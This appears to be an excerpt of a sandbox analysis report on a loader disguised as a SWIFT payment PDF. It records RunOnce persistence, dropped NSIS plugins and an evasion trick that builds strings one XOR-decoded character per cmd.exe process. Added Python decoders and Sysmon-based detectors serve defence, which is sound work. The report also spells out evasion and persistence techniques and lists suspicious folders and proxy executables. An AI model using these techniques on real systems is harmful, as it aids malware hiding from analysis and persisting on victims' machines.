          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
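Each of the cmd.exe processes above evaluates one expression of the form `N^177`: `set /a` computes the integer and, because it runs from a command line rather than inside a batch file (which is what `cmd /c` gives it), prints the result, so the parent obtains one byte per child process without that byte ever appearing in a command line. The decoder below is an added example and is not code from the Joe Sandbox report or from the sample. It re-implements `set /a` with cmd's 32-bit signed semantics on top of Python's `ast` so an attacker-controlled expression is never passed to `eval()`. Applied to the first ten entries in the report's listing order (the `SAMPLE_COMMANDS` list is built from those entries; treating listing order as spawn order is an assumption), the key 177 (0xB1) yields `KERNEL32::`, the `module::function` form the NSIS System plugin uses for API calls, consistent with the `System.dll` the report shows dropped into `nsv10BA.tmp`. Later entries decode only to fragments such as `eFileA(`, so the evidence list is not in spawn order beyond that prefix; a reconstruction should be driven by process-creation timestamps instead. The function names are this example's own.

```python
"""Decode the one-character-per-process `set /a` commands listed above.

Added example; this is not code from the Joe Sandbox report or from the
analysed sample. `set /a` evaluates an integer expression and, when run
from a command line rather than inside a batch file (which is what
`cmd /c` does), prints the result, so the parent collects one byte per
cmd.exe it spawns. Re-implementing the evaluator with cmd's 32-bit signed
semantics recovers those bytes from the process list without executing
the sample.
"""
import ast
import operator
import re
from typing import List, Optional

# Constructed sample: the command lines of the first ten "Process created"
# entries above, in the report's listing order. Treating listing order as
# spawn order is an assumption; the report does not state it.
SAMPLE_COMMANDS = [
    'cmd.exe /c set /a "250^177"', 'cmd.exe /c set /a "244^177"',
    'cmd.exe /c set /a "227^177"', 'cmd.exe /c set /a "255^177"',
    'cmd.exe /c set /a "244^177"', 'cmd.exe /c set /a "253^177"',
    'cmd.exe /c set /a "130^177"', 'cmd.exe /c set /a "131^177"',
    'cmd.exe /c set /a "139^177"', 'cmd.exe /c set /a "139^177"',
]

# `set /a "<expr>"` or `set /a <expr>`; the quotes stop cmd treating ^ as an escape.
_SET_A_RE = re.compile(r'set\s+/a\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def _wrap32(value: int) -> int:
    """Reduce to cmd's signed 32-bit integer range (set /a overflows silently)."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value >= (1 << 31) else value


def _trunc_div(a: int, b: int) -> int:
    """Integer division truncating toward zero, as cmd does (Python's // floors)."""
    if b == 0:
        raise ZeroDivisionError("set /a: divide by zero")
    q = abs(a) // abs(b)
    return -q if (a < 0) != (b < 0) else q


_BINARY = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: _trunc_div, ast.Mod: lambda a, b: a - b * _trunc_div(a, b),
    ast.LShift: operator.lshift, ast.RShift: operator.rshift,
    ast.BitAnd: operator.and_, ast.BitOr: operator.or_, ast.BitXor: operator.xor,
}
_UNARY = {ast.USub: operator.neg, ast.UAdd: operator.pos, ast.Invert: operator.invert}


def _eval(node: ast.AST) -> int:
    """Walk the parsed expression, accepting only integer literals and the
    operators set /a knows. Names, calls and attributes are rejected, so an
    attacker-controlled command line never reaches eval()."""
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY:
        return _wrap32(_UNARY[type(node.op)](_eval(node.operand)))
    if isinstance(node, ast.BinOp) and type(node.op) in _BINARY:
        return _wrap32(_BINARY[type(node.op)](_eval(node.left), _eval(node.right)))
    raise ValueError(f"unsupported token in set /a expression: {ast.dump(node)}")


def set_a(expr: str) -> int:
    """Evaluate a set /a expression. cmd reads a leading 0 as octal; Python 3
    rejects such literals, so they are rewritten to 0o... before parsing."""
    expr = re.sub(r"\b0([0-7]+)\b", r"0o\1", expr.strip())
    return _eval(ast.parse(expr, mode="eval").body)


def extract_expr(cmdline: str) -> Optional[str]:
    """Pull the arithmetic expression out of a `cmd /c set /a ...` command line."""
    m = _SET_A_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def decode_commands(cmdlines: List[str]) -> bytes:
    """Evaluate each set /a command in order; the low byte of every result is
    the character the loader obtains from that process."""
    out = bytearray()
    for line in cmdlines:
        expr = extract_expr(line)
        if expr is not None:
            out.append(set_a(expr) & 0xFF)
    return bytes(out)


def printable(data: bytes) -> str:
    """Render decoded bytes, escaping anything outside printable ASCII."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else f"\\x{b:02x}" for b in data)


if __name__ == "__main__":
    decoded = decode_commands(SAMPLE_COMMANDS)
    print(printable(decoded))   # the first ten entries decode to KERNEL32::
```

The key is visible in every command line, so nothing has to be brute-forced; the value of the evaluator is that it refuses anything other than integer arithmetic, which matters because the strings come straight from an untrusted process tree. To rebuild the full string from a live incident, feed it the children of the loader PID ordered by creation time rather than this evidence list.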
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Code function: 6_2_00405EA2 GetModuleHandleA, LoadLibraryA, GetProcAddress
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Code function: 6_2_10002CE0 push eax; ret 6_2_10002D0E
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe File created: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exe
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Blankbook
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Blankbook
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Blankbook
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Blankbook
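The four writes above set a RunOnce value named `Blankbook`; the report shows the value name but not its data. The detector below is an added example, neither code from the Joe Sandbox report nor the text of the Sigma rule it matched. It takes records shaped like Sysmon Event ID 13 (registry value set) and flags Run/RunOnce values whose program lives in a user-writable folder, generalising the rule's idea in three ways a practitioner needs in production: environment variables such as `%TEMP%` are expanded before matching, the program path is extracted from quoted and unquoted command strings, and for proxy executables such as `rundll32.exe` the arguments are inspected too. Everything in the sample events is constructed: the SID, the profile path `C:\Users\user`, the expansions in `ENV`, the OneDrive allow-list entry and all target paths are hypothetical.

```python
"""Flag Run/RunOnce values whose target lives in a user-writable folder.

Added example; it is neither code from the Joe Sandbox report nor the text
of the Sigma rule the report matched. Input is a list of records shaped
like Sysmon Event ID 13 (registry value set). The events below are
constructed: the report shows that the sample writes the RunOnce value
"Blankbook" but not what data it holds, so every path here is hypothetical.
"""
import ntpath
import re
from typing import Dict, List, Optional, Tuple

USER_PROFILE = "C:\\Users\\user"   # assumed profile path used for %TEMP% etc.

# Expansions an autorun entry commonly relies on (assumed values).
ENV = {
    "%windir%": "C:\\Windows", "%systemroot%": "C:\\Windows",
    "%programfiles%": "C:\\Program Files", "%programdata%": "C:\\ProgramData",
    "%public%": "C:\\Users\\Public", "%userprofile%": USER_PROFILE,
    "%appdata%": USER_PROFILE + "\\AppData\\Roaming",
    "%localappdata%": USER_PROFILE + "\\AppData\\Local",
    "%temp%": USER_PROFILE + "\\AppData\\Local\\Temp",
    "%tmp%": USER_PROFILE + "\\AppData\\Local\\Temp",
}

# HKU\<SID> or HKLM, optionally Wow6432Node, then Run or RunOnce and the value name.
AUTORUN_KEY_RE = re.compile(
    r"\\software\\(?:wow6432node\\)?microsoft\\windows\\currentversion\\"
    r"(?:run|runonce)\\(?P<name>[^\\]+)$", re.IGNORECASE)

# Most specific marker first; the label is what an alert reports.
SUSPICIOUS_DIRS = [
    ("\\appdata\\local\\temp\\", "user temp"), ("\\windows\\temp\\", "windows temp"),
    ("\\users\\public\\", "public profile"), ("\\programdata\\", "ProgramData"),
    ("\\appdata\\roaming\\", "roaming profile"), ("\\appdata\\local\\", "local profile"),
    ("\\downloads\\", "downloads"), (":\\temp\\", "root temp"),
]
# Example allow-list of known-good prefixes (lower-case); tune per environment.
ALLOWLIST_PREFIXES = ["c:\\users\\user\\appdata\\local\\microsoft\\onedrive\\"]
# Proxy executables whose interesting path sits in the arguments.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "cmd.exe"}
EXE_EXT = (".exe", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".scr", ".hta", ".dll")


def expand_env(s: str) -> str:
    """Replace %VAR% tokens using the assumed ENV table; unknown ones are kept."""
    return re.sub(r"%[^%]+%", lambda m: ENV.get(m.group(0).lower(), m.group(0)), s)


def extract_image_path(details: str) -> str:
    """Return the program part of an autorun command string: a quoted path
    verbatim, otherwise tokens joined until one ends in a known extension, so
    an unquoted path containing spaces resolves the way CreateProcess would."""
    s = expand_env(details.strip())
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    tokens = s.split()
    for i in range(len(tokens)):
        candidate = " ".join(tokens[: i + 1])
        if candidate.lower().endswith(EXE_EXT):
            return candidate
    return tokens[0] if tokens else ""


def suspicious_folder(path: str) -> Optional[str]:
    """Label of the first suspicious folder marker in path, unless allow-listed."""
    p = path.lower().replace("/", "\\")
    if any(p.startswith(a) for a in ALLOWLIST_PREFIXES):
        return None
    for marker, label in SUSPICIOUS_DIRS:
        if marker in p:
            return label
    return None


def scan(events: List[Dict[str, object]]) -> List[Tuple[str, str, str]]:
    """Return (value name, resolved program, reason) for each suspicious autorun write."""
    findings = []
    for ev in events:
        if ev["EventID"] != 13:
            continue
        m = AUTORUN_KEY_RE.search(str(ev["TargetObject"]))
        if not m:
            continue
        details = str(ev["Details"])
        image = extract_image_path(details)
        reason = suspicious_folder(image)
        if reason is None and ntpath.basename(image).lower() in LOLBINS:
            reason = suspicious_folder(expand_env(details))   # e.g. rundll32 <dll>,<export>
        if reason:
            findings.append((m.group("name"), image, reason))
    return findings


HKU = "HKU\\S-1-5-21-1111111111-2222222222-3333333333-1001"   # constructed SID
CV = "\\Software\\Microsoft\\Windows\\CurrentVersion\\"
EVENTS = [  # constructed Sysmon EID 13 records; all paths are hypothetical
    {"EventID": 13, "TargetObject": HKU + CV + "RunOnce\\Blankbook",
     "Details": "C:\\Users\\user\\AppData\\Local\\Temp\\nsx1234.tmp\\stage2.exe"},
    {"EventID": 13, "TargetObject": "HKLM\\SOFTWARE" + CV + "Run\\SecurityHealth",
     "Details": "%windir%\\system32\\SecurityHealthSystray.exe"},
    {"EventID": 13, "TargetObject": HKU + CV + "Run\\OneDrive",
     "Details": '"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background'},
    {"EventID": 13, "TargetObject": HKU + CV + "Run\\Updater",
     "Details": '"%TEMP%\\update svc\\updater.exe" -q'},
    {"EventID": 13, "TargetObject": HKU + CV + "Run\\Loader",
     "Details": "rundll32.exe C:\\Users\\Public\\Libraries\\core.dll,Start"},
    {"EventID": 13, "TargetObject": HKU + CV + "Explorer\\Advanced\\Hidden",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for name, image, reason in scan(EVENTS):
        print(f"{name}: {image} ({reason})")
```

On the sample events this reports `Blankbook`, `Updater` and `Loader` and stays quiet on the Windows-owned `SecurityHealth` entry and the allow-listed OneDrive one. The `\AppData\Local\` and `\AppData\Roaming\` markers are deliberately broad, since several legitimate per-user installers live there; the allow-list is where that noise is handled, and it should be built from the environment's own inventory rather than copied from this example.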
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
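The cmd.exe entries above are the same one-character-per-process launches, this time counted as an evasion: every child is one more process for the sandbox to trace, and the string being assembled never sits in a single command line. The detector below is an added example, not part of the Joe Sandbox report. It runs over records shaped like Sysmon Event ID 1 (process creation), groups children by parent and by a digit-collapsed command template (so `set /a "250^177"` and `set /a "244^177"` count as the same command), and alerts when a sliding time window holds at least a threshold of them. The records are constructed inline: the parent PID 1976 and the XOR values are taken from the report, while the timestamps, child PIDs, the benign explorer.exe children and the build job are invented; the window of 10 seconds and threshold of 8 are assumed tuning values.

```python
"""Detect a parent spawning a burst of near-identical child processes.

Added example, not part of the Joe Sandbox report. The sample above
launches one cmd.exe per decoded character, which keeps the string out of
any single command line and hands the sandbox dozens of processes to trace.
This runs over records shaped like Sysmon Event ID 1 (process creation)
that are constructed inline: PIDs, timestamps and the benign entries are
invented; only the set /a values are taken from the report's list.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

WINDOW_SECONDS = 10.0   # assumed tuning; widen for slow hosts
THRESHOLD = 8


class Alert(NamedTuple):
    parent_pid: int
    parent_image: str
    template: str
    count: int
    span_seconds: float


def template(cmdline: str) -> str:
    """Collapse digit runs so 'set /a "250^177"' and 'set /a "244^177"' compare equal."""
    return re.sub(r"\d+", "#", cmdline.strip().lower())


def detect_bursts(events: List[Dict[str, object]], window: float = WINDOW_SECONDS,
                  threshold: int = THRESHOLD) -> List[Alert]:
    """Group children by (parent pid, command template), slide a time window
    over their start times and alert on the densest window at or above the
    threshold. Grouping by template separates a loader stamping out the same
    command from a shell that merely starts many different programs."""
    starts: Dict[Tuple[int, str], List[float]] = defaultdict(list)
    parent_image: Dict[int, str] = {}
    for ev in events:
        ppid = int(ev["ParentProcessId"])
        starts[(ppid, template(str(ev["CommandLine"])))].append(float(ev["UtcTime"]))
        parent_image.setdefault(ppid, str(ev["ParentImage"]))
    alerts = []
    for (ppid, tpl), times in starts.items():
        times.sort()
        best, best_span, start = 0, 0.0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # shrink window from the left
                start += 1
            if end - start + 1 > best:
                best, best_span = end - start + 1, times[end] - times[start]
        if best >= threshold:
            alerts.append(Alert(ppid, parent_image[ppid], tpl, best, round(best_span, 3)))
    return sorted(alerts, key=lambda a: -a.count)


def _ev(t, pid, ppid, parent_image, image, cmdline):
    """Build one constructed EID 1-shaped record."""
    return {"UtcTime": t, "ProcessId": pid, "ParentProcessId": ppid,
            "ParentImage": parent_image, "Image": image, "CommandLine": cmdline}


LOADER = "C:\\Users\\user\\Desktop\\SWIFTCOPYMT1030000000_pdf.exe"
CMD = "C:\\Windows\\SysWOW64\\cmd.exe"
XOR_VALUES = [250, 244, 227, 255, 244, 253, 130, 131, 139, 139, 242, 250]  # report order

# The loader (report PID 1976) stamping out children 150 ms apart (timing invented).
EVENTS = [_ev(100.0 + 0.15 * i, 5000 + i, 1976, LOADER, CMD, f'cmd.exe /c set /a "{v}^177"')
          for i, v in enumerate(XOR_VALUES)]
EVENTS += [  # benign noise: distinct programs from a shell, similar commands spread out in time
    _ev(101.0, 6000, 4100, "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe",
        "notepad.exe notes.txt"),
    _ev(103.5, 6001, 4100, "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mspaint.exe",
        "mspaint.exe"),
]
EVENTS += [_ev(200.0 + 10.0 * i, 7000 + i, 4200, "C:\\Tools\\make.exe", "C:\\Tools\\cl.exe",
               f"cl.exe /c src{i}.c") for i in range(6)]

if __name__ == "__main__":
    for a in detect_bursts(EVENTS):
        print(f"pid {a.parent_pid} ({a.parent_image}) spawned {a.count} x {a.template!r} "
              f"in {a.span_seconds}s")
```

On the constructed data only the loader trips the rule (12 identical-template children in under two seconds); the build job issues similar commands but ten seconds apart, so no window ever reaches the threshold. In production the template function is where tuning happens: collapsing digits is enough for this loader, but installers that embed GUIDs or temp-file names in arguments need those normalised as well before their children group together.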
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe API coverage: 0.2 %
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Code function: 6_2_00405454 GetTempPathA, DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Code function: 6_2_00405E7B FindFirstFileA, FindClose
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Code function: 6_2_0040264F FindFirstFileA
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Code function: 136_2_0040264F FindFirstFileA
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Code function: 136_2_00405454 DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Code function: 136_2_00405E7B FindFirstFileA, FindClose
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe File opened: C:\Users\user
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe File opened: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe File opened: C:\Users\user\udskriftskartotek\chiromancy\refalling\Nonessential\Uforstaaeligheds.Com
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe File opened: C:\Users\user\AppData\Local
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe File opened: C:\Users\user\AppData\Local\Temp
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe File opened: C:\Users\user\AppData
          Source: SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134625856432.00000000076BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134625856432.00000000076BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWk
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe API call chain: ExitProcess graph end node graph_6-4294
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe API call chain: ExitProcess graph end node graph_6-4136
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe API call chain: ExitProcess graph end node graph_136-3313
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe API call chain: ExitProcess graph end node graph_136-3319
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Code function: 6_2_00402C33 GetTempPathA, GetTickCount, GetModuleFileNameA, GetFileSize, LdrInitializeThunk, GlobalAlloc, SetFilePointer
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Code function: 6_2_00405EA2 GetModuleHandleA, LoadLibraryA, GetProcAddress
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
